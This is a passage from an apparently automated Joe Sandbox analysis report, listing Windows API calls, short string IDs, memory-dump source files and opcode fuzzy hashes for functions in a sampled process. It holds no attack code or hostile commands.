                              • wcsrchr.MSVCRT ref: 00007FF744F29A62
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                              • String ID: %s=%s$.
                              • API String ID: 3242694432-4275322459
                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction ID: 9458a3f77c32027030299baf705d7ec20bb33211ee9e05745ac92dc0288a6f3b
                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction Fuzzy Hash: 87418F21B0D742D6FB20BF52A0D46B9E2A0FF857A0F984230DD5D07BD9DE7DE841A621
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentDirectorytowupper
                              • String ID: :$:
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              APIs
                              • memset.MSVCRT ref: 00007FF744F0921C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F093AA
                                • Part of subcall function 00007FF744F08B20: wcsrchr.MSVCRT ref: 00007FF744F08BAB
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BD4
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BF2
                                • Part of subcall function 00007FF744F08B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F08C16
                                • Part of subcall function 00007FF744F08B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F08C2F
                                • Part of subcall function 00007FF744F08B20: wcschr.MSVCRT ref: 00007FF744F08CB3
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF744F092AC), ref: 00007FF744F130CA
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F130DD
                                • Part of subcall function 00007FF744F13060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F130F6
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F13106
                              • wcsrchr.MSVCRT ref: 00007FF744F092D8
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F09362
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F09373
                              Similarity
                              • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                              • String ID:
                              Similarity
                              • API ID: ErrorModememset$FullNamePath_wcsicmp
                              • String ID:
                              Similarity
                              • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                              • String ID:
                              APIs
                                • Part of subcall function 00007FF744F133A8: iswspace.MSVCRT(?,?,00000000,00007FF744F2D6EE,?,?,?,00007FF744F20632), ref: 00007FF744F133C0
                              • iswspace.MSVCRT(?,?,?,00007FF744F132A4), ref: 00007FF744F1331C
                              Similarity
                              • API ID: iswspace
                              • String ID: off
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: %s=%s$DPATH$PATH
                              Similarity
                              • API ID: wcscmp
                              • String ID: *.*$????????.???
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6D0
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6E7
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B701
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B715
                              Similarity
                              • API ID: Heap$Process$AllocSize
                              • String ID:
                              APIs
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05A2E
                              • _open_osfhandle.MSVCRT ref: 00007FF744F05A4F
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F237AA
                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F237D2
                              Similarity
                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                              • String ID:
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256C5
                              • RtlFreeHeap.NTDLL ref: 00007FF744F256D9
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256FD
                              • RtlFreeHeap.NTDLL ref: 00007FF744F25711
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F1EE64
                              • RtlFreeHeap.NTDLL ref: 00007FF744F1EE78
                              Similarity
                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                              • String ID:
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID:
                              • API String ID: 1606018815-0
                              • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction ID: c5d180bd216bad9aeaa30a082b070fd1a3834689181c2c8ec9a601c070538841
                              • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction Fuzzy Hash: DDF0A235529A42CBD744BF11E484179FA60FB8AB42F889274DE4B063D8DF3CD5159B50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitle
                              • String ID: -
                              • API String ID: 3358957663-3695764949
                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction ID: 567dedb37c6608fa6e958bb3e1a5ad27161864cc832405e11b426251e5b89662
                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction Fuzzy Hash: C6317021A0D682C6EB14BF13A884078E6A4EB89B90F9D5135DE0E077D9EF7CE441E724
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpswscanf
                              • String ID: :EOF
                              • API String ID: 1534968528-551370653
                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction ID: 709e72f1f92fa5520eb781d0d50f0901aa146010d9a7f47e8bddd848ed210a76
                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction Fuzzy Hash: 99314C31A1CA46C6FB54BF57A8802B8F2E0EF55B50FCC5131EE4E462D9DF2CE841A660
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3$3
                              • API String ID: 0-2538865259
                              • Opcode ID: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction ID: b878e8c913dfdab1e5b9da9fad28db2f53291041632704d93e68aa4948094ca9
                              • Opcode Fuzzy Hash: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction Fuzzy Hash: CB01F371D5E582CAF314BFA298C8674B660BBA4311FDC5135CE0E015E9DF3C7894A661
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction ID: 59fb5f7045792851bd5c14d8019b9b2b3f6aff530c963de63aa67d58d01e9bf9
                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction Fuzzy Hash: 8A412772A0D652CAEB15BF12E484579B7B0EB85B90F989035DE4D07BD8DF3CA840E760